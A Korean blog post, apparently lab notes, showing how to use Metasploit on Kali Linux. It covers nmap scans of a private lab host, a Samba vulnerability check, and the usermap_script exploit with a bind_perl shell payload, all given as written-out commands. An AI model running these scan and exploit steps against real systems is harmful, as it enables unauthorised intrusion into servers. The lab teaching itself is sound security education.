일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | ||||||
2 | 3 | 4 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 |
- 로드밸런서
- 파일시그니처
- ncp
- Burp Suite
- 정보보호
- 와이어샤크
- 네이버클라우드
- AWS
- 취약점
- RDS
- AWS SSA
- isms
- 로그분석
- EC2
- 인스턴스
- 개인정보보호법
- Iam
- 클라우드 자격증
- ISMS-P
- 보안컨설팅
- metasploit
- 클라우드서비스
- 공개키
- AWS SAA
- 클라우드
- azure
- 클라우드보안
- 클라우드자격증
- mysql
- 정보보안
- Today
- Total
처음 만나는 클라우드 보안
Metasploit를 활용한 시스템 해킹 실습 본문
Metasploit란?
H.D Morre에 의해 개발된 테스트 목적용 시스템 해킹 framework를 말한다. 처음엔 Moore에 의해 Perl로 작성되었지만, Rapid7에 의해 인수 된 후 Ruby로 재구조화 되어 공격모듈의 확장자는 .rb이다. Window, Linux버전이 제공되며 공격 모듈을 모두 악성코드로 인식하는 Window에서는 설치시 동작에 장애가 발생한다. 반면, Kali Linux에 설치 된 Matasploit의 활용은 매우 간편하다.
Matasploit 실행 (Kali Linux)
: 첫 실행시 DB생성 및 사용자 등록 과정이 필요하며 이후의 과정은 'sudo msfconsole' 명령어로 실행 가능하다.
첫실행시: 시작메뉴 => 08 Exploitation tools => Metasploit framwork => DB생성 및 시작
실습 순서
: Metasploit를 활용한 침투는 크게 4단계로 나눌 수 있다.
1단계 - nmap이용해 공격대상의 취약포트를 찾는다. 버전
2단계 - 스크립트를 이용해서 진짜 그 취약점이 존재하는지 확인
3단계 - 구글에서 관련 취약점 검색, Metasploit에서 사용할 스크립트를 찾는다.
4단계 - Metasploit에서 Exploit를 실행하여 결과를 확인한다.
1단계 포트 스캔
nmap이용해서 버전 스캔, All 스캔 =>침투 가능한 취약 포트를 찾는다.
sudo nmap -sV 192.168.5.130
sudo nmap -A 192.168.5.130 -p 139 // 타겟 139번 포트 집중스캔
2단계 스크립트 확인
: 스크립트를 이용해서 취약점의 존재여부를 확인한다.
nmap에서 관련 script 확인
sudo find / -name "samba-vuln-cve-2012-1182.nse"
3단계 정보수집
: 구글에 해당 취약점 smbd 3.0.20-Debian 관련 정보를 수집한다. Metasploit모듈과 명령어 확인이 가능하다.해보면
4단계 Exploit
msf6 > search usermap_script
msf6 > use exploit/multi/samba/usermap_script //구글링 결과와 일치
msf6 > info //스크립트 내용 확인
msf6 > set rhost 192.168.5.130
msf6 > show payloads //exploit이후 사용할 통신방법을 선택한다.
set payload cmd/unix/bind_perl //bind_perl 하나를 임의로 지정해주었다.
msf6 > exploit //exploit 수행
'정보보안' 카테고리의 다른 글
Metasploit를 활용한 Window7 해킹실습 (0) | 2022.05.04 |
---|---|
Metasploit 포트 별 시스템 해킹 실습 (feat. daemon => root전환) (0) | 2022.05.03 |
약점(Weakness)과 취약점(Vulnerability) (0) | 2022.05.03 |
암호화 실습: Wireshark를 활용한 SSH 접속 암호화 패킷 확인하기 (0) | 2022.05.03 |
암호화 핵심정리 (0) | 2022.05.03 |